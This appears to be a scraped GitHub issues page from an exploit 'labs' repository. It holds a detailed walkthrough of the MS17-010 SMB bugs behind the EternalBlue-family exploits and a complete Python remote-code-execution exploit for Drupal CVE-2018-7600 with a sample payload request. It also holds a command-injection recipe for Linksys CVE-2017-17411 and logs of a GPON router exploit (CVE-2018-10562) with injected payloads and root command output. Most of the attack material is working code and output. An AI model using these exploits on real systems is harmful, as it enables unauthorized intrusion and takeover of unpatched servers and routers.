Code Monkey home page Code Monkey logo

labs's People

Contributors

hajdbo avatar nixawk avatar notre1 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

labs's Issues

guide

INFO:main:target: https://auth.westeros.XYZABC.it/
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable

unable to find server version guess it has been patched already

[Analysis] MS17_010

Nice Job From: https://github.com/worawit/MS17-010/blob/master/BUG.txt

===============
SMB Transaction
===============
To understand the bugs, we need to understand SMB transaction because most bugs in MS17-010 are related to transation.
I try to make it short.

SMB message structure is well documented in https://msdn.microsoft.com/en-us/library/ee441702.aspx. We might need it 
for reference.

As documented in https://msdn.microsoft.com/en-us/library/ee441466.aspx, there are 6 SMB commands for transaction subprotocol.
If a transaction message is larger than SMB message (determined by MaxBufferSize in session parameter), a client 
MUST use one or more SMB_COM_*TRANSACT*_SECONDARY command (with same TID, UID, PID and MID in SMB header) to send 
transaction message that did not fit in the initial message.

Each SMB transaction command has subcommand codes. There are 3 group of transaction subcommand as documented in
https://msdn.microsoft.com/en-us/library/ee441514.aspx (because SMB_COM_*TRANSACT*_SECONDARY comamnds are needed to 
send a large transaction message).

Now, we go through some implementaion detail on Windows SMB transaction.
- A TRANSACTION struct and transaction data buffer are always allocated in 1 buffer. In memory, a TRANSACTION struct
  is always followed by data buffer as shown below.
    +-----------------+--------------------------------------------+
    |   TRANSACTION   |   transaction data buffer                  |
    +-----------------+--------------------------------------------+

- A transaction buffer is paged pool buffer.
- There is lookaside for transaction buffer which size is 0x5000.
  - if size <=0x5000, use lookaside
    - all buffer size will be 0x5000 (even required buffer size is only 0x100)
  - if size >0x5000, directly allocate from paged pool
  - if transaction command is SMB_COM_TRANSACTION and SetupCount is 0, directly allocate from paged pool

- TRANSACTION important struct member
  - InSetup : The pointer to received setup in transaction data buffer.
  - OutSetup : The pointer to reply setup (is set when all transaction data is received and NOT in transaction data buffer).
  - InParameters : The pointer to received parameter(s) in transaction data buffer.
  - OutParameters : The pointer to reply parameter(s) in transaction data buffer.
  - InData : The pointer to received data in transaction data buffer.
  - OutData : The pointer to reply data in transaction data buffer.
  - SetupCount : The number of setup words that are included in the transaction request.
                 This one determines InSetup buffer size.
  - MaxSetupCount : Maximum number of setup bytes that the client will accept in the transaction reply.
                    This one determines OutSetup buffer size.
  - ParameterCount : The current number of received parameter bytes or the number of parameter to be sent in reply.
  - TotalParameterCount : The total number of parameter bytes to be sent in this transaction request.
                          This one determines InParameters buffer size.
  - MaxParameterCount : The maximum number of parameter bytes that the client will accept in the transaction reply.
                        This one determines OutParameters buffer size.
  - DataCount : The current number of received data bytes or the number of data to be sent in reply.
  - TotalDataCount : The total number of data bytes to be sent in this transaction request.
                     This one determines InData buffer size.
  - MaxDataCount : The maximum number of data bytes that the client will accept in the transaction reply.
                   This one determines OutData buffer size.
  - Function : The NT transaction subcommand code.
  - Tid : The transaction Tid.
  - Pid : The transaction Pid.
  - Uid : The transaction Uid.
  - Mid/Fid : The transaction Mid.
  - AllDataReceived : The boolean which set to 1 when (ParameterCount == TotalParamterCount && DataCount == TotalDataCount).

- There are 3 memory layout for InParameters, OutParameters, InData, OutData buffer in transaction data buffer.
  - memory layout for SMB_COM_TRANSACTION except TRANS_MAILSLOT_WRITE and "TRANS with zero SetupCount" is shown below.
    In* and Out* buffers are overlapped.
      +---------------+------------------------------------------------------+
      |  TRANSACTION  |             transaction data buffer                  |
      +---------------+------------------------------------------------------+
                      | InSetup |   InParameters   |      InData       |     |
                      +------------------------------------------------------+
                      |  OutParameters  |            OutData                 |
                      +------------------------------------------------------+
  - memory layout for SMB_COM_TRANSACTION2 and exception case from above SMB_COM_TRANSACTION is shown below.
    All buffers are not overlapped.
      +---------------+------------------------------------------------------------------------------+
      |  TRANSACTION  |                       transaction data buffer                                |
      +---------------+------------------------------------------------------------------------------+
                      | InSetup |  InParameters  |     InData     |  OutParameters  |    OutData     |
                      +------------------------------------------------------------------------------+
  - memory layout for SMB_COM_NT_TRANS is shown below. InParameters and OutParameters are overlapped. 
    InData and OutData are overlapped.
      +---------------+-----------------------------------------------------------+
      |  TRANSACTION  |               transaction data buffer                     |
      +---------------+-----------------------------------------------------------+
                      | InSetup |      InParameters    |     InData      |        |
                      +---------+----------------------+--------------------------+
                      |         |  OutParameters  |    |        OutData           |
                      +-----------------------------------------------------------+
  
- Transaction is executed when (ParameterCount == TotalParamterCount && DataCount == TotalDataCount).
- While executing transaction, InParameters and InData pointer might be modified.
- After transaction is executed, ParameterCount and DataCount (is normally set in called transaction function) are used 
  for determining the reply size of OutParameters and OutData respectively.

- A SMB_COM_*_SECONDARY request can be used to overwrite a sent transaction parameters and data with displacement.
  ParameterCount and DataCount is added no matter what (valid) displacement value is.
  - assume TotalParameterCount is 0 and TotalDataCount is 16
  - first transaction request has 8 bytes of data
  - secondary transaction request can have 8 bytes of data with displacement 0
    - 8 bytes of data in first transaction request is overwritten
    - next 8 bytes of data never be written
- For multipiece transaction (transaction that used secondary to complete transaction), a server uses 
  last SMB_COM_*_SECONDARY command to determine transaction type.
  - if last command is SMB_COM_TRANSACTION_SECONDARY, a server executes subcommand as TRANS_*.
  - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
  - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
- A transaction is also used in SMB_COM_WRITE_ANDX command (https://msdn.microsoft.com/en-us/library/ee441954.aspx)
  when WriteMode is RAW_MODE. The transaction uses FID in parameters instead of MID in SMB header for
  matching transaction.

That should be enough for SMB transaction. It's time to start bug details.
Below is bugs I found from MS17-010 diff.



===========
Bug1: Uninitialized transaction InParameters and InData buffer
===========
A transaction data buffer is not initialized. If we send multipiece transaction request with displacement 0,
a server will use uninitialized parameter and data for input. An uninitialized input here is normally useless
because a server processes input parameter and data as untrusted data.

If we found a transaction subcommand that use part of input as output, we could use this bug for 
leaking uninitialized data.

A transaction subcommand that perfect for exploiting this bug is NT_TRANSACT_RENAME. The NT_TRANSACT_RENAME 
is documented as "Not implemented". But there is a code in SrvSmbNtRename() function.

Here is psuedocode for SrvSmbNtRename()

SrvSmbNtRename()
{
    // ParameterCount must be >= 4
    // first 2 bytes of InParameters is fid
    // verify fid
    // if verification failed, return error without data
    // if verification success, return success without modifying OutParameters, ParameterCount, OutData, DataCount
}

But, as mentioned above, transaction InData and OutData are overlapped. Without modifying any 
transaction *Parameter* and *Data*, a server returns InData (like echo).

An only REQUIREMENT for using NT_TRANSACT_RENAME command is valid fid. So we need to get fid by opening 
any named pipe or share first.

This bug is not helpful for exploitation because leaked info is from freed buffer. It is difficult to get 
exact information because a transaction size is always >=0x5000.

Here is some useful of this bug:
- detect a target architecture (32 or 64 bit) from leak pointer
- might contain important data

The PoC filename for this bug is infoleak_uninit.py

Note:
- this bug is not used in NSA leak tools.
- because the fix only set zero to InParameters and InData buffer, it is still possible to do information disclosure
  from OutParameters and OutData. May17 security patches fix information disclosure from OutParameters and OutData in
  various function (no zero the whole OutParameters and OutData buffer).
- May17 security patches modify SrvSmbNtRename() to return an error.



===============
Bug2: TRANS_PEEK_NMPIPE transaction subcommand expects MaxParameterCount to be 16
===============
SrvPeekNamedPipe() is used for handling TRANS_PEEK_NMPIPE subcommand (https://msdn.microsoft.com/en-us/library/ee441845.aspx).
It peeks the named pipe data to OutParameters buffer. The named pipe data is placed at OutParameters+16.
If MaxParameterCount is 16, OutData will point to correct named pipe data. By setting MaxParameterCount larger than 16, 
we can leak uninitialized OutData buffer. But we can do better by using it with Bug3.

The fix of this bug is used by scanners to determine if MS17-010 has been patched or not.

SrvAllocationTransaction() is used for allocating a transaction struct and data buffer. If a transaction data buffer size is 
greater than 0x10400, the SrvAllocationTransaction() will set a pointer to transaction to NULL. Then, the server replies 
an error code 0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES).

When sending a large MaxParameterCount and MaxDataCount (sum of them is >0x10400), we will got an error code 0xC0000205.
Because MS17-010 patch changes MaxParameterCount to 16 if transaction subcommand is TRANS_PEEK_NMPIPE before calling 
SrvAllocationTransaction(), SrvPeekNamedPipe() will be called even sum of MaxParameterCount and MaxDataCount is >0x10400.
The response from SrvPeekNamedPipe() is depended on our InSetup.



===============
Bug3: Transaction reply data size might be larger than allocated buffer size
===============
SrvCompleteExecuteTransaction() function is used for sending transaction reply to a client. But it has no check if
ParameterCount/DataCount is larger than MaxParameterCount/MaxDataCount. SrvCompleteExecuteTransaction() might
copy reply data from outside of buffer (OOB read) to client. This can lead to information disclosure.

To exploit the bug, we send a TRANS_PEEK_NMPIPE transaction subcommannd (Bug2) with MaxParameterCount to very large value and 
MaxDataCount to 1. If a transaction reply data size (DataCount) is more than MaxDataCount, SrvCompleteExecuteTransaction() 
will send OutData and data next to OutData buffer to a client. The transaction buffer should look like below.
    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |  InParameters  |       InData       |     |
                    +-----------------------------------------------------+------------+
                    |           OutParameters                     |OutData|  OOB read  |
                    +-----------------------------------------------------+------------+

The NSA eternalromance uses this bug and Bug2 to do a info disclosure. The PoC file is eternalromance_leak.py.

The bug is fixed in Windows 8 (since release) and later. MS17-010 add the same code as Windows 8 to fix this bug on Windows<8.

NSA eternalromance relies on this bug to leak TRANSACTION struct. So NSA eternalromance cannot exploit Windows 8 and later.



===============
Bug4: Transaction ParameterCount/DataCount might be greater than TotalParameterCount/TotalDataCount
===============
When sending SMB_COM_*_SECONDARY command, a server checks a displacement value and a size of data to not write outside of
allocated buffer. But there is no check if total received ParameterCount/DataCount is greater than
TotalParameterCount/TotalDataCount.

For example:
- a transaction with TotalDataCount=0x20
- first request, send 0x18 bytes of data (DataCount=0x18)
- next request, send 0x10 bytes of data (DataCount=0x28)

Normally, this bug is not useful for exploitation. But it can be used with Bug5 (below).



===============
Bug5: Transaction secondary request is accepted and processed after transaction execution is started
===============
If we send a transaction secondary request to a transaction that AllDataReceived member has already been set, a server will 
send back an error without processing the request.

For multipiece transaction, AllDataReceived is set (in SrvSmbTransactionSecondary()/SrvSmbNtTransactionSecondary()) before 
executing transaction. But AllDataReceived is NOT set (in SrvSmbTransaction()/SrvSmbNtTransaction()) when transaction is 
completed in 1 SMB message. This allow us to send a transaction secondary request to modify InParamter/InData buffer and 
ParameterCount/DataCount while server is executing a transaction or sending a reply.


First case to exploit this bug is sending a transaction secondary request while a server is sending a reply. The result is
a server replies data outside of OutData buffer (similar to Bug3). But this method seems to be race condition that diffcult to win.
NSA eternalchampion and eternalsynergy use very nice trick to always win this race condition.

When doing SMB login, we send SMB_COM_SESSION_SETUP_ANDX (https://msdn.microsoft.com/en-us/library/ee442101.aspx) request to
a server. The request contains MaxBufferSize field (https://msdn.microsoft.com/en-us/library/ee441849.aspx) which is 
the maximum size, in bytes, of the largest SMB message that the client can receive.

If a transaction reply size is larger than MaxBufferSize, a server will send multiple transaction replies to a client. To resume
sending next transaction reply, a server add work queue to call RestartTransactionResponse() function. Moreover, 
RestartTransactionResponse() has no check about MaxParameterCount and MaxDataCount.

With above information, the NSA exploit sends SMB_COM_SESSION_SETUP_ANDX (login) with specific MaxBufferSize. Then, the exploit
creates one complete NT_TRANS_RENAME request which response size is larger than MaxBufferSize and one NT_TRANS_RENAME 
secondary request, with a number of data is a number of byte to leak. Finally, the exploit sends these 2 requests in 1 TCP packet.

After a server sends first part of transaction reply, a server queue a call to RestartTransactionResponse() after NT_TRANS_RENAME
secondary request. The transaction DataCount is increased when processing the NT_TRANS_RENAME secondary request (this works 
because of Bug4). Then, the server sends second part of transaction reply with data outside of OutData buffer.

We can see PoC for leaking information with this bug in eternalchampion_leak.py and eternalsynergy_leak.py. I do not know why
both exploits use different parameters.


Another case to exploit this bug is sending a transaction secondary request while a server is executing a transaction. This case
is very difficult to find a exploit path and requires to win a race (champion). The NSA eternalchampion uses
TRANS2_QUERY_PATH_INFORMATION subcommand (https://msdn.microsoft.com/en-us/library/ee441634.aspx) with 
SMB_INFO_IS_NAME_VALID query information level (https://msdn.microsoft.com/en-us/library/ff470079.aspx).

In SrvSmbQueryPathInformation() function with SMB_INFO_IS_NAME_VALID information level, the transaction InData pointer is 
modified to point to UNICODE_STRING struct allocated on stack. After modified InData pointer, if a server processes a transaction
secondary request before executing transaction is finished, the stack data (saved eip/rip) will be overwritten with certain offset 
by data and dataDisplacement in transaction secondary. Because offset in stack is always fixed, NSA eternalchampion has no
chance to crash a target.

The PoC file for this bug is eternalchampion_poc.py

Note: I found the same fix for this bug in SrvSmbWriteAndX() too



===============
Bug6: Transaction secondary can be used with any transaction type
===============
Normally SMB_COM_TRANSACTION command must be followed by SMB_COM_TRANSACTION_SECONDARY command, SMB_COM_TRANSACTION2 command must be 
followed by SMB_COM_TRANSACTION2_SECONDARY command and SMB_COM_NT_TRANS command must be followed by SMB_COM_NT_TRANS_SECONDARY
command if transaction data in first SMB message is not complete. But a server has no check. So we can send any transaction 
secondary command (which matches TID, UID, PID and MID) to complete a transaction.

Do not forget that a server uses last SMB_COM_*_SECONDARY command to determine transaction type. So we can turn any transaction type
to be SMB_COM_TRANSACTION or SMB_COM_TRANSACTION2. We cannot turn non SMB_COM_NT_TRANS to SMB_COM_NT_TRANS because SMB_COM_NT_TRANS
uses Function to determine transaction subcommand.

This bug is used in NSA eternalblue exploit for sending large transaction data (>=0x10000 bytes) for TRANS2_OPEN2. Because only 
SMB_COM_NT_TRANS request use 4 bytes for TotalDataCount field (other use 2 bytes), the exploit have to start a transaction with
SMB_COM_NT_TRANS command then following the SMB_COM_TRANSACTION2_SECONDARY command.
You can see an example usage in eternalblue_poc.py.

As I mentioned in introduction section, a transaction is also used in SMB_COM_WRITE_ANDX command when WriteMode is RAW_MODE.
This is very interesting case because SrvSmbWriteAndX() writes data to transacation with below code.

    memmove(transaction->Indata, request->data, request->dataLength);
    transaction->InData += request->dataLength; // shift InData pointer
    transaction->DataCount += request->dataLength;

Notice that SrvSmbWriteAndX() shifts InData pointer when writing data, while transaction secondary uses dataDisplacement to set
where to write a data in InData buffer (without moving InData).

Assume we start a transaction with TotalDataSize=0x2000 with MID value same as FID of open named pipe. The memory layout look
like below (I omit OutParameters and OutData because they are not related).

    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |   InParameters   |        InData          |
                    +-----------------------------------------------------+

Then, we send a SMB_COM_WRITE_ANDX command with WriteMode=RAW_MODE and 0x100 bytes of data.

    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |   InParameters   |    |       InData           |
                    +-----------------------------------------------------+

Then, writing outside transaction data buffer is possible if we send a transaction secondary command with dataDisplacement=0x1f??.

This OOB write is very good for exploitation however SMB_COM_WRITE_ANDX command with RAW_MODE write requires a valid named pipe fid.
Since Windows Vista, the default Windows configuration without additional service does not allow an anonymous logon (NULL session)
to access any named pipe.

You can see PoC in eternalromance_poc.py and eternalsynergy_poc.py (with large paged groom method to show another heap spraying method).

Note: NSA eternalromance and eternalsynergy use this bug for OOB write. Eternalromance uses Bug3 for leaking transaction struct
(which is limited to Windows<8) but eternalsynergy uses Bug5 for leaking transaction struct and some trick to find 
a NonPagedPoolExecute page (I do not check how exploit exactly work) in Windows 8 and Windows 2012.


===============
Bug7: Wrong type assigment in SrvOs2FeaListSizeToNt()
===============
The FEA (Full Extended Attribute), https://msdn.microsoft.com/en-us/library/ee915515.aspx, is used in SMB_COM_TRANSACTION2 subcommands.
Normally we need to send FEA_LIST (https://msdn.microsoft.com/en-us/library/ff359296.aspx) in SMB_COM_TRANSACTION2 subcommands request.
When processing SMB_COM_TRANSACTION2 subcommands request wth FEA_LIST, Windows need to convert FEA_LIST to a list of 
FILE_FULL_EA_INFORMATION (https://msdn.microsoft.com/en-us/library/cc232069.aspx).

There is a bug while converting FEA_LIST to FILE_FULL_EA_INFORMATION if FEA_LIST.SizeOfListInBytes is >=0x10000. The SrvOs2FeaListToNt()
is used for converting which has following psuedocode.

SrvOs2FeaListToNt()
{
    outputLen = SrvOs2FeaListSizeToNt(feaList);
    output = SrvAllocateNonPagedPool(outputLen);
    // start copy all FEA data to output in a list of FILE_FULL_EA_INFORMATION format
}

SrvOs2FeaListSizeToNt(feaList)
{
    outputLen = 0;
    foreach (fea in feaList) {
        if (IsFeaDataOutOfBound(fea, feaList)) {
            // shrink feaList.SizeOfListInBytes to only valid fea so copy step does not need to check again.
            // feaList.SizeOfListInBytes is DWORD but it is cast to WORD so HIDWORD is not modified.
            (WORD) feaList.SizeOfListInBytes = Pos(fea) - Pos(feaList);
            return outputLen;
        }
        outputLen += GetNtLengthForFea(fea);
    }
    return outputLen;
}

From above pseudocode, if we send feaList.SizeOfListInBytes=0x10000 while valid FEA entries in list is less than
0x10000 bytes (assume 0x4000), the feaList.SizeOfListInBytes will be modified to 0x14000 because HIDWORD is not modified and
outputLen is only 0x4000. Then the output buffer will be overflowed while copying FEA data to output buffer.

As mentioned above, we need to send a transaction data that larger than 0x10000 bytes. But the FEA_LIST data is used
only in SMB_COM_TRANSACTION2 which TotalDataCount is USHORT (max is 0xffff). So we need to Bug6 to send a FEA_LIST 
data that larger than 0x10000.

The exploit path that required minimum condition is TRANS2_OPEN2 subcommand. The SrvSmbOpen2() calls SrvOs2FeaListToNt()
for converting FEA_LIST before any permission checking. So a client just need to access any share (IPC$ is best choice)
and able to send SMB_COM_NT_TRANS and SMB_COM_TRANSACTION2_SECONDARY commands.

Above exploitation requirements are good for Windows<8 because Windows<8 always allow anonymous (NULL session) to 
access IPC$ and send transaction commands. However, Windows>=8 does not allow anonymous to access IPC$ by default 
(IPC$ might be acessible but most of transaction commands cannot be used).

You can see PoC in eternalblue_poc.py



===============
Bug8: Wrong type assigment in SrvOs2GeaListSizeToNt()
===============
The bug is same as Bug7 in different function but all exploit path requires valid fid.



===============
Bug9: SESSION_SETUP_AND_X request format confusion
===============
This bug is not fixed in MS17-010. I put it here because NSA leak tools use it for exploitation. The bug itself 
can only fool a server to allocate a large nonpaged pool (<0x20000) for storing small client information.

There are 2 format of SMB_COM_SESSION_SETUP_ANDX request for "NT LM 0.12" dialect. The first format is documented
in https://msdn.microsoft.com/en-us/library/ee441849.aspx. It is used for LM and NTLM authentication. Another format
is documented in https://msdn.microsoft.com/en-us/library/cc246328.aspx. It is used for NTLMv2 (NTLM SSP) authentication.
We noted that these 2 foramts have different WordCount (first one is 13 and later is 12).

The SMB_COM_SESSION_SETUP_ANDX request is handled by BlockingSessionSetupAndX() function. Below is psuedocode for hanlding
both request format (only related part).

BlockingSessionSetupAndX()
{
    // ...
    
    // check word count
    if (! (request->WordCount == 13 || (request->WordCount == 12 && (request->Capablilities & CAP_EXTENDED_SECURITY))) ) {
        // error and return
    }
    
    // ...
    
    if ((request->Capablilities & CAP_EXTENDED_SECURITY) && (smbHeader->Flags2 & FLAGS2_EXTENDED_SECURITY)) {
        // this request is Extend Security request
        GetExtendSecurityParameters();  // extract parameters and data to variables
        SrvValidateSecurityBuffer();  // do authentication
    }
    else {
        // this request is NT Security request
        GetNtSecurityParameters();  // extract parameters and data to variables
        SrvValidateUser();  // do authentication
    }
    
    // ...
}

From psuedocode above, if we send SMB_COM_SESSION_SETUP_ANDX request as Extended Security (WordCount 12) with 
CAP_EXTENDED_SECURITY but no FLAGS2_EXTENDED_SECURITY, the request will be processed as NT Security request (WordCount 13).
We can also send the request as NT Security request (WordCount 13) with CAP_EXTENDED_SECURITY and FLAGS2_EXTENDED_SECURITY.
But later case is no use because there is an extra check of ByteCount value in GetExtendSecurityParameters() function.

Normally a server validates WordCount and ByteCount field in SrvValidateSmb() function before passing a request to 
request handler. The WordCount*2 and ByteCount must not be larger than received data size. With the confusing bug, a server
read ByteCount from wrong offset while extracting parameters and data to variables.

The bug does not cause any memory corruption or information disclosure because ByteCount value is only used for calculating
buffer size for storing NativeOS and NativeLanMan unicode string (UTF16). The NativeOS and NativeLanMan size is caculated from 
"ByteCount - other_data_size". The buffer for NativeOS and NativeLanMan unicode string is allocated on nonpaged pool.

NSA eternalchampion uses this bug to set UNICODE_STRING.MaximumLength to 0x15ff and place staging shellcode in buffer because 
nonpaged pool is executable on Windows<8.
Note: On x86, 'ff15????????' is 'call [????????]' instruction. On x64, 'ff1500000000' is 'call [rip+0]'. 

NSA eternalblue uses this bug to creating hole because we can control when to allocate and free the buffer.

The PoC filename for this bug is npp_control.py and the example usages of this bug is eternalblue_exploit.py and eternalchampion_poc2.py

Note: This mothod cannot use for user authentication if NTLM authentication is disabled

References

  1. https://github.com/worawit/MS17-010/blob/master/BUG.txt

[Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code

Description

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

Exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# CVE-2018-7600
# Drupal: Unsanitized requests allow remote attackers to execute arbitrary code

"""Tested against Drupal 8.4.5

$ wget -c https://ftp.drupal.org/files/projects/drupal-8.4.5.tar.gz
$ setup Apache2 + Mysql + Drupal

$ python exploit-CVE-2018-7600.py http://192.168.1.19 "pwd"
/var/www/html

----

POST /user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail%5B%23type%5D=markup&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23markup%5D=printf admin | md5sum

HTTP/1.1 200 OK
Date: Fri, 13 Apr 2018 05:19:28 GMT
Server: Apache/2.4.29 (Debian)
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 191
Connection: close
Content-Type: application/json

[{"command":"insert","method":"replaceWith","selector":null,"data":"21232f297a57a5a743894a0e4a801fc3  -\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]

"""

# sudo pip install requests


from __future__ import print_function

__all__ = ['exploit']
__author__ = [
    'a2u',   # module developer
    'Nixawk' # module Improved
]

import sys
import requests


def send_http_payload(drupal_home_url, php_func, php_func_param):
    """Exploit CVE-2018-7600 drupal: Unsanitized requests
    allow remote attackers to execute arbitrary code
    """
    
    params = {
        'element_parents': 'account/mail/#value',
        'ajax_form': 1,
        '_wrapper_format': 'drupal_ajax'
    }

    payload = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
        'mail[#type]': 'markup',
        'mail[#post_render][]': php_func,
        'mail[#markup]': php_func_param
    }

    # Clean URLs - Enabled
    url = requests.compat.urljoin(drupal_home_url, '/user/register')

    return requests.post(
        url,
        params=params,
        data=payload
    )


def check(drupal_home_url):
    """Check if the target is vulnerable to CVE-2018-7600.
    """
    status = False

    randflag = 'CVE-2018-7600'
    vulnflag = randflag + '[{"command":"insert"'
    response = send_http_payload(drupal_home_url, 'printf', randflag)
    if response and response.status_code == 200 and randflag in response.text:
        print("[*] %s is vulnerable" % drupal_home_url)
        status = True
    else:
        print("[?] %s is unknown" % drupal_home_url)

    return status


def exploit(drupal_home_url, php_exec_func='passthru', command='whoami'):
    """Execute os command.
    """
    response = send_http_payload(drupal_home_url, php_exec_func, command)
    if '[{"command":"insert"' in response.text:
        command_output, _ = response.text.split('[{"command":"insert"')
        print(command_output)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python %s <drupal-home-url> <cmd>" % sys.argv[0])
        sys.exit(0)

    exploit(sys.argv[1], command=sys.argv[2])

References

CVE-2017-0199

it does not seems to work or do anything, please what is the proper way of generating the .doc

[Exploit] CVE-2017-17411 - Linksys WVBR0 25 Command Injection

Command Injection

echo "xxx.xxx.xxx.xxxUSER-AGENT" | md5sum
  • xxx.xxx.xxx.xxx is your ip.
  • USER-AGENT can be a command injection @string.

Send a http request with an command injection payload user-agent.

References

  1. https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
  2. https://thehackernews.com/2017/12/directv-wvb-hack.html
  3. https://github.com/nixawk/labs/blob/master/CVE-2017-17411/exploit-CVE-2017-17411.py

[Exploit] CVE-2018-10562 GPON Home Routers RCE

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin
boot
bootimg
dev
etc
home
include
initrd
lib
linuxrc
man
mnt
opt
proc
root
sbin
sys
tmp
uImage
usr
var
web
BGgw;

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /bin/"
INFO:__main__:sending payload: 127.0.0.1;`echo BMXr;ls /bin/;echo BMXr`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BMXr
Console
EthMgr
GponCLI
GponSLID
LogMgr
MecMgr
MiscMgr
NetMgr
PonMgr
Ssp
TimerMgr
VmrMgr
WebMgr
ash
brctl
busybox
cat
catv
chgrp
chmod
chown
conntrack
cp
date
dd
df
dmesg
dnsmasq
dropbear
dsp
echo
egrep
false
fgrep
grep
gunzip
gzip
hostname
ip
ipaddr
iplink
iproute
iprule
iptables
iptables-restore
iptables-save
iptables-xml
iptunnel
kill
ln
ls
lsof
lspci
mReport
mkdir
mknod
mktemp
mount
mountpoint
mv
netstat
nice
ntpclient
pidof
ping
printenv
ps
pure-ftpd
pwd
rm
rmdir
sed
sh
sleep
stat
stty
sync
tar
tc
telnetd
touch
tr069Mgr
true
ttcp
umount
uname
usleep
vi
zcat
BMXr;

";

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /sbin/"
INFO:__main__:sending payload: 127.0.0.1;`echo rXVS;ls /sbin/;echo rXVS`;
diag_result = "ping -c 4 -s 64 127.0.0.1;rXVS
arp
ath_wifi.sh
ath_wifi_aquila.sh
ez-ipupdate
fget
format
gdbnfs
halt
hostapd
ifconfig
ifrename
init
insmod
iwconfig
iwevent
iwgetid
iwlist
iwpriv
iwspy
logread
lsmod
memshow
modprobe
nbtscan
nfsstart
ntfs-3g
poweroff
pppd
pppoe
pppoe-config
pppoe-connect
pppoe-stop
reboot
repeater_pass_configuration
rg_setup.sh
rmmod
route
scsi_id
setup.sh
sysctl
syslogd
udev
udev_volume_id
udevd
udevsend
udevstart
udhcpc
upnpd
vconfig
wifi_cb
wifi_test
wlanconfig
wpatalk
rXVS;


$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ps"
INFO:__main__:sending payload: 127.0.0.1;`echo TFGQ;ps;echo TFGQ`;
diag_result = "ping -c 4 -s 64 127.0.0.1;TFGQ
  PID  Uid        VSZ Stat Command
    1 root       1136 S   init
    2 root            SWN [ksoftirqd/0]
    3 root            SW< [events/0]
    4 root            SW< [khelper]
    5 root            SW< [kthread]
   20 root            SW< [kblockd/0]
   23 root            SW< [khubd]
   40 root            SW  [pdflush]
   41 root            SW  [pdflush]
   42 root            SW< [kswapd0]
   43 root            SW< [aio/0]
   79 root            SW  [mtdblockd]
  183 root            SWN [jffs2_gcd_mtd1]
  187 root       1132 S   syslogd
  193 root        724 S < udevd
  407 root            SW< [voshwtimer/0]
  470 root       2116 S   /bin/GponCLI
  473 root       1808 S   /bin/telnetd
  476 root       1288 S   /bin/dropbear
  477 root       2116 S   /bin/GponCLI --script
  478 root       2116 S   /bin/GponCLI --hook
  479 root       1832 S   Ssp
  480 root       1832 S   Ssp
  481 root       1832 S < Ssp
  482 root       1856 S < /bin/TimerMgr -p 10 -s 0
